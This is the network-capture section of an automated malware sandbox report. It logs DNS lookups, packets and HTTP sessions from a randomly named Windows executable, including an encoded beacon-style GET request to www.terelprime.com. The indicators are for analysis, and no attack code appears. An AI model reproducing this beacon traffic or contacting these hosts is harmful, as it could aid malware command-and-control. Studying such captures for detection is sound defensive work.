                                                            May 2, 2024 15:57:14.273094893 CEST49729443192.168.2.552.165.165.26
                                                            May 2, 2024 15:57:14.274713993 CEST49729443192.168.2.552.165.165.26
                                                            May 2, 2024 15:57:14.274719000 CEST4434972952.165.165.26192.168.2.5
                                                            May 2, 2024 15:57:14.274943113 CEST4434972952.165.165.26192.168.2.5
                                                            May 2, 2024 15:57:14.281521082 CEST49729443192.168.2.552.165.165.26
                                                            May 2, 2024 15:57:14.328118086 CEST4434972952.165.165.26192.168.2.5
                                                            May 2, 2024 15:57:14.626741886 CEST4434972952.165.165.26192.168.2.5
                                                            May 2, 2024 15:57:14.626764059 CEST4434972952.165.165.26192.168.2.5
                                                            May 2, 2024 15:57:14.626779079 CEST4434972952.165.165.26192.168.2.5
                                                            May 2, 2024 15:57:14.626987934 CEST49729443192.168.2.552.165.165.26
                                                            May 2, 2024 15:57:14.626995087 CEST4434972952.165.165.26192.168.2.5
                                                            May 2, 2024 15:57:14.627084017 CEST49729443192.168.2.552.165.165.26
                                                            May 2, 2024 15:57:14.630079985 CEST49729443192.168.2.552.165.165.26
                                                            May 2, 2024 15:57:14.630098104 CEST4434972952.165.165.26192.168.2.5
                                                            May 2, 2024 15:57:14.630104065 CEST49729443192.168.2.552.165.165.26
                                                            May 2, 2024 15:57:14.630109072 CEST4434972952.165.165.26192.168.2.5
                                                            May 2, 2024 15:57:22.933917999 CEST49731443192.168.2.5142.251.40.100
                                                            May 2, 2024 15:57:22.933965921 CEST44349731142.251.40.100192.168.2.5
                                                            May 2, 2024 15:57:22.934031010 CEST49731443192.168.2.5142.251.40.100
                                                            May 2, 2024 15:57:22.934587955 CEST49731443192.168.2.5142.251.40.100
                                                            May 2, 2024 15:57:22.934607029 CEST44349731142.251.40.100192.168.2.5
                                                            May 2, 2024 15:57:23.192994118 CEST44349731142.251.40.100192.168.2.5
                                                            May 2, 2024 15:57:23.196868896 CEST49731443192.168.2.5142.251.40.100
                                                            May 2, 2024 15:57:23.196909904 CEST44349731142.251.40.100192.168.2.5
                                                            May 2, 2024 15:57:23.197216034 CEST44349731142.251.40.100192.168.2.5
                                                            May 2, 2024 15:57:23.200743914 CEST49731443192.168.2.5142.251.40.100
                                                            May 2, 2024 15:57:23.200807095 CEST44349731142.251.40.100192.168.2.5
                                                            May 2, 2024 15:57:23.240528107 CEST49731443192.168.2.5142.251.40.100
                                                            May 2, 2024 15:57:33.193774939 CEST44349731142.251.40.100192.168.2.5
                                                            May 2, 2024 15:57:33.193847895 CEST44349731142.251.40.100192.168.2.5
                                                            May 2, 2024 15:57:33.194088936 CEST49731443192.168.2.5142.251.40.100
                                                            May 2, 2024 15:57:34.288096905 CEST49731443192.168.2.5142.251.40.100
                                                            May 2, 2024 15:57:34.288145065 CEST44349731142.251.40.100192.168.2.5

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            May 2, 2024 15:56:18.952701092 CEST53584731.1.1.1192.168.2.5
                                                            May 2, 2024 15:56:18.961909056 CEST53548731.1.1.1192.168.2.5
                                                            May 2, 2024 15:56:19.033629894 CEST5881553192.168.2.51.1.1.1
                                                            May 2, 2024 15:56:19.033770084 CEST5239253192.168.2.51.1.1.1
                                                            May 2, 2024 15:56:19.122273922 CEST53588151.1.1.1192.168.2.5
                                                            May 2, 2024 15:56:19.122472048 CEST53523921.1.1.1192.168.2.5
                                                            May 2, 2024 15:56:21.449517965 CEST53498521.1.1.1192.168.2.5
                                                            May 2, 2024 15:56:42.188267946 CEST53567751.1.1.1192.168.2.5
                                                            May 2, 2024 15:57:03.817553997 CEST53578701.1.1.1192.168.2.5
                                                            May 2, 2024 15:57:05.559663057 CEST6008753192.168.2.51.1.1.1
                                                            May 2, 2024 15:57:05.689049006 CEST53600871.1.1.1192.168.2.5
                                                            May 2, 2024 15:57:10.695286989 CEST5425753192.168.2.51.1.1.1
                                                            May 2, 2024 15:57:10.875540018 CEST53542571.1.1.1192.168.2.5
                                                            May 2, 2024 15:57:18.549957037 CEST53572431.1.1.1192.168.2.5
                                                            May 2, 2024 15:57:27.372304916 CEST53513751.1.1.1192.168.2.5
                                                            May 2, 2024 15:57:48.704616070 CEST53518271.1.1.1192.168.2.5
                                                            May 2, 2024 15:58:33.030631065 CEST53574311.1.1.1192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            May 2, 2024 15:56:19.033629894 CEST192.168.2.51.1.1.10x2134Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                            May 2, 2024 15:56:19.033770084 CEST192.168.2.51.1.1.10xd40dStandard query (0)www.google.com65IN (0x0001)false
                                                            May 2, 2024 15:57:05.559663057 CEST192.168.2.51.1.1.10x1d70Standard query (0)www.besthomeincome24.comA (IP address)IN (0x0001)false
                                                            May 2, 2024 15:57:10.695286989 CEST192.168.2.51.1.1.10xca1eStandard query (0)www.terelprime.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            May 2, 2024 15:56:19.122273922 CEST1.1.1.1192.168.2.50x2134No error (0)www.google.com142.251.40.100A (IP address)IN (0x0001)false
                                                            May 2, 2024 15:56:19.122472048 CEST1.1.1.1192.168.2.50xd40dNo error (0)www.google.com65IN (0x0001)false
                                                            May 2, 2024 15:57:05.689049006 CEST1.1.1.1192.168.2.50x1d70Name error (3)www.besthomeincome24.comnonenoneA (IP address)IN (0x0001)false
                                                            May 2, 2024 15:57:10.875540018 CEST1.1.1.1192.168.2.50xca1eNo error (0)www.terelprime.com66.96.161.166A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.google.com
                                                            • fs.microsoft.com
                                                            • slscr.update.microsoft.com
                                                            • https:
                                                              • www.bing.com
                                                            • www.terelprime.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.54972866.96.161.166806844C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 2, 2024 15:57:10.974353075 CEST469OUTGET /ufuh/?p80t2Pu=YGhnx96XAVFPN8tv1lUEEiUVdSmZ/iyWteKDUnkDVIOF49Ku923zDENpH5OUCIyJQHomPTwvfF1wQ0t1Y4t+Kv0hk37pk2XOQoNeMFqeOrHvpWJ1tST0YGmxjRv23ozT3g==&B6bX=zjl0 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            Host: www.terelprime.com
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            May 2, 2024 15:57:11.080749989 CEST1087INHTTP/1.1 404 Not Found
                                                            Date: Thu, 02 May 2024 13:57:10 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 867
                                                            Connection: close
                                                            Server: Apache
                                                            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                            Accept-Ranges: bytes
                                                            Age: 0
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549706142.251.40.1004434332C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 13:56:20 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                            Host: www.google.com
                                                            Connection: keep-alive
                                                            X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: empty
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-05-02 13:56:20 UTC1191INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 13:56:20 GMT
                                                            Pragma: no-cache
                                                            Expires: -1
                                                            Cache-Control: no-cache, must-revalidate
                                                            Content-Type: text/javascript; charset=UTF-8
                                                            Strict-Transport-Security: max-age=31536000
                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-9RwWnFWwxTJ0vTLqSSQJTg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                            Accept-CH: Sec-CH-UA-Platform
                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                            Accept-CH: Sec-CH-UA-Arch
                                                            Accept-CH: Sec-CH-UA-Model
                                                            Accept-CH: Sec-CH-UA-Bitness
                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                            Accept-CH: Sec-CH-UA-WoW64
                                                            Permissions-Policy: unload=()
                                                            Content-Disposition: attachment; filename="f.txt"
                                                            Server: gws
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Accept-Ranges: none
                                                            Vary: Accept-Encoding
                                                            Connection: close
                                                            Transfer-Encoding: chunked
                                                            2024-05-02 13:56:20 UTC64INData Raw: 35 34 61 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 64 6f 77 20 6a 6f 6e 65 73 20 73 74 6f 63 6b 73 22 2c 22 6e 62 61 20 62 6f 73 74 6f 6e 20 63 65 6c 74 69 63 73 22 2c 22 6e 79 74 20 63 72 6f 73
                                                            Data Ascii: 54a)]}'["",["dow jones stocks","nba boston celtics","nyt cros
                                                            2024-05-02 13:56:20 UTC1255INData Raw: 73 77 6f 72 64 20 63 6c 75 65 73 22 2c 22 75 6e 69 74 65 64 20 6d 65 74 68 6f 64 69 73 74 20 63 68 75 72 63 68 22 2c 22 70 73 20 70 6c 75 73 20 6d 61 79 20 32 30 32 34 20 6d 6f 6e 74 68 6c 79 20 67 61 6d 65 73 22 2c 22 73 61 6e 20 6a 61 63 69 6e 74 6f 20 72 69 76 65 72 20 66 6c 6f 6f 64 69 6e 67 22 2c 22 62 69 74 63 6f 69 6e 20 63 72 79 70 74 6f 63 75 72 72 65 6e 63 79 22 2c 22 6b 65 6e 74 75 63 6b 79 20 62 61 73 6b 65 74 62 61 6c 6c 20 74 72 61 6e 73 66 65 72 20 70 6f 72 74 61 6c 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73
                                                            Data Ascii: sword clues","united methodist church","ps plus may 2024 monthly games","san jacinto river flooding","bitcoin cryptocurrency","kentucky basketball transfer portal"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groups
                                                            2024-05-02 13:56:20 UTC42INData Raw: 45 57 48 52 7a 54 6b 4d 79 51 55 46 42 53 44 4a 46 62 45 56 52 56 6c 4a 4a 61 56 6c 57 57 47 6b 7a 4c 32 46 53 61 45 78 0d 0a
                                                            Data Ascii: EWHRzTkMyQUFBSDJFbEVRVlJJaVlWWGkzL2FSaEx
                                                            2024-05-02 13:56:20 UTC1255INData Raw: 66 66 36 0d 0a 6c 57 46 5a 5a 5a 32 64 56 52 47 6c 4a 5a 47 74 4a 65 56 46 69 65 6b 31 42 54 45 78 42 56 6e 5a 70 4e 47 5a 55 59 54 46 4d 52 6d 52 74 61 56 42 6e 4d 45 4a 44 4e 45 35 4b 59 32 31 50 54 44 64 72 4e 30 78 31 54 47 30 34 57 57 74 36 55 31 5a 77 4e 7a 4e 78 57 43 39 30 64 57 52 47 55 55 70 7a 65 44 52 75 53 48 59 31 4f 57 59 77 63 6d 5a 36 65 6c 52 6c 65 6b 31 33 54 6b 4e 56 4f 55 38 72 4b 30 35 50 57 46 67 34 56 56 56 4f 52 47 4e 73 52 6b 35 51 55 54 46 68 59 6d 4d 72 53 48 41 33 4d 6c 70 6d 5a 58 5a 77 62 6e 63 76 61 55 5a 46 5a 48 70 45 57 56 52 72 63 54 52 44 63 6d 31 69 4f 58 5a 75 4d 32 64 71 4e 6d 59 76 4b 33 52 32 52 55 56 79 56 6c 63 77 64 44 52 5a 64 43 39 6c 56 33 4e 52 64 44 68 59 55 45 38 76 65 48 64 51 4b 33 5a 36 54 47 5a 6f 4c
                                                            Data Ascii: ff6lWFZZZ2dVRGlJZGtJeVFiek1BTExBVnZpNGZUYTFMRmRtaVBnMEJDNE5KY21PTDdrN0x1TG04WWt6U1ZwNzNxWC90dWRGUUpzeDRuSHY1OWYwcmZ6elRlek13TkNVOU8rK05PWFg4VVVORGNsRk5QUTFhYmMrSHA3MlpmZXZwbncvaUZFZHpEWVRrcTRDcm1iOXZuM2dqNmYvK3R2RUVyVlcwdDRZdC9lV3NRdDhYUE8veHdQK3Z6TGZoL
                                                            2024-05-02 13:56:20 UTC1255INData Raw: 57 70 68 52 33 68 6d 53 33 70 55 63 55 46 34 52 30 39 76 62 32 6c 71 65 58 42 73 52 31 6c 72 64 33 42 72 59 6e 46 50 62 32 31 54 54 47 64 74 59 31 56 73 64 56 55 77 62 45 4e 68 4d 47 31 57 4d 55 78 4a 4e 6c 70 70 5a 53 73 30 61 32 30 7a 54 54 4a 55 4d 32 4a 71 61 44 42 4e 57 46 56 32 61 6d 64 71 53 57 64 70 62 31 56 31 4d 7a 68 6a 56 6d 68 54 62 47 78 77 55 32 49 34 55 48 52 43 57 48 4d 79 63 6a 56 54 61 55 52 4f 63 6d 6c 59 4d 57 39 6d 52 57 4e 4f 56 48 4a 55 54 48 4a 57 65 6b 4d 79 53 47 70 48 55 30 56 4f 63 47 74 42 63 6c 4a 78 63 57 4a 4c 53 30 4e 4d 54 55 78 32 64 6e 68 55 65 6e 6f 34 54 47 68 42 4f 55 46 32 4b 32 70 4c 62 47 64 4d 56 45 74 54 5a 57 59 78 63 45 52 30 62 32 35 73 61 58 4a 6a 5a 31 64 61 64 6b 4e 52 65 6e 68 75 61 44 6c 4a 4e 57 73 77
                                                            Data Ascii: WphR3hmS3pUcUF4R09vb2lqeXBsR1lrd3BrYnFPb21TTGdtY1VsdVUwbENhMG1WMUxJNlppZSs0a20zTTJUM2JqaDBNWFV2amdqSWdpb1V1MzhjVmhTbGxwU2I4UHRCWHMycjVTaUROcmlYMW9mRWNOVHJUTHJWekMySGpHU0VOcGtBclJxcWJLS0NMTUx2dnhUeno4TGhBOUF2K2pLbGdMVEtTZWYxcER0b25saXJjZ1dadkNRenhuaDlJNWsw
                                                            2024-05-02 13:56:20 UTC1255INData Raw: 65 46 56 54 4e 44 56 53 54 55 70 49 51 6a 4e 59 53 58 5a 56 5a 33 52 78 62 56 70 50 55 6b 39 59 54 32 4a 33 63 57 4e 6b 55 45 78 45 5a 6a 4d 76 54 31 46 69 63 6c 42 59 65 44 4a 48 57 56 67 79 63 69 74 45 59 58 46 6f 53 32 70 4a 62 6c 52 55 65 6c 56 6b 63 6a 4e 4c 61 31 5a 73 4b 7a 4e 51 5a 46 42 77 4d 45 52 7a 61 6e 4e 57 55 58 56 4a 65 55 77 31 57 45 77 72 64 6c 64 4c 57 55 70 73 63 6a 42 4d 61 6a 55 79 57 54 56 57 62 46 6f 78 63 48 4a 4a 63 6d 45 79 4f 45 35 34 59 30 46 59 4f 45 70 49 4e 6d 56 4d 65 46 64 6b 63 57 68 77 54 57 70 6f 59 7a 4e 77 61 30 45 79 4d 55 39 61 4e 6c 52 78 64 31 70 30 5a 57 39 56 63 33 64 4b 57 57 31 58 64 6d 64 7a 57 44 52 45 4b 7a 5a 70 64 6d 35 54 4c 7a 6c 6f 55 54 46 77 59 57 30 31 57 48 52 6b 57 6a 56 46 61 32 39 68 51 6d 46
                                                            Data Ascii: eFVTNDVSTUpIQjNYSXZVZ3RxbVpPUk9YT2J3cWNkUExEZjMvT1FiclBYeDJHWVgycitEYXFoS2pJblRUelVkcjNLa1ZsKzNQZFBwMERzanNWUXVJeUw1WEwrdldLWUpscjBMajUyWTVWbFoxcHJJcmEyOE54Y0FYOEpINmVMeFdkcWhwTWpoYzNwa0EyMU9aNlRxd1p0ZW9Vc3dKWW1XdmdzWDREKzZpdm5TLzloUTFwYW01WHRkWjVFa29hQmF
                                                            2024-05-02 13:56:20 UTC328INData Raw: 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70
                                                            Data Ascii: 0002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttyp
                                                            2024-05-02 13:56:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549710142.251.40.1004434332C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 13:56:20 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                            Host: www.google.com
                                                            Connection: keep-alive
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: empty
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-05-02 13:56:21 UTC1303INHTTP/1.1 302 Found
                                                            Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGIS3zrEGIjADQ9prssbiFt-L_5K4tVFjERaECr0SODryfA9n0H_9lEBIEBVFk-F7Bm0UyvX68ZUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                            x-hallmonitor-challenge: CgsIhbfOsQYQsqHIehIEv2CW4Q
                                                            Content-Type: text/html; charset=UTF-8
                                                            Strict-Transport-Security: max-age=31536000
                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                            Permissions-Policy: unload=()
                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                            Date: Thu, 02 May 2024 13:56:21 GMT
                                                            Server: gws
                                                            Content-Length: 427
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            Set-Cookie: 1P_JAR=2024-05-02-13; expires=Sat, 01-Jun-2024 13:56:21 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                            Set-Cookie: NID=513=XX9SCO9uBqPZK_6GTKY6i0I4bnOvX3cUFGGA-ERtIDS8lqZAgck7QWP0U-yiIzWDrJOUdb-LUBfC9giXKTd75FgaiDHVap4INX6nrI7jKARb3Rcsw6MqPbA8aQu4E_DN1KAMvmNc72vfZ6WzhoChkHBtxKII97lEZMyQbhV03ac; expires=Fri, 01-Nov-2024 13:56:20 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close
                                                            2024-05-02 13:56:21 UTC427INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 25 33 46 61 73 79 6e
                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549711142.251.40.1004434332C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 13:56:20 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                            Host: www.google.com
                                                            Connection: keep-alive
                                                            X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: empty
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-05-02 13:56:21 UTC1330INHTTP/1.1 302 Found
                                                            Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGIS3zrEGIjAy2SY_wKQfS3Qr9DIp4alnyJkCTUiOIWFLBr4l8U2O7-X7PjrHl9WYNHcJAlxWu-0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                            x-hallmonitor-challenge: CgsIhbfOsQYQoqffIhIEv2CW4Q
                                                            Content-Type: text/html; charset=UTF-8
                                                            Strict-Transport-Security: max-age=31536000
                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                            Permissions-Policy: unload=()
                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                            Date: Thu, 02 May 2024 13:56:21 GMT
                                                            Server: gws
                                                            Content-Length: 458
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            Set-Cookie: 1P_JAR=2024-05-02-13; expires=Sat, 01-Jun-2024 13:56:21 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                            Set-Cookie: NID=513=kagEDjFykvKoAP0yl0sL1kceCdSlsxq38rbJXvvayh012PxpNNXfpbKkzAh7U8g-UcB5j8kSKnHvFbFlm_drDhRUplG0u-yRqpVq4Bp0PrYa_i3zve2NFSHgx-VHdiOxzy44Flbipwim5igaZ1Atm6f83h90MBFNiD0xnZ1XgEU; expires=Fri, 01-Nov-2024 13:56:20 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close
                                                            2024-05-02 13:56:21 UTC458INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
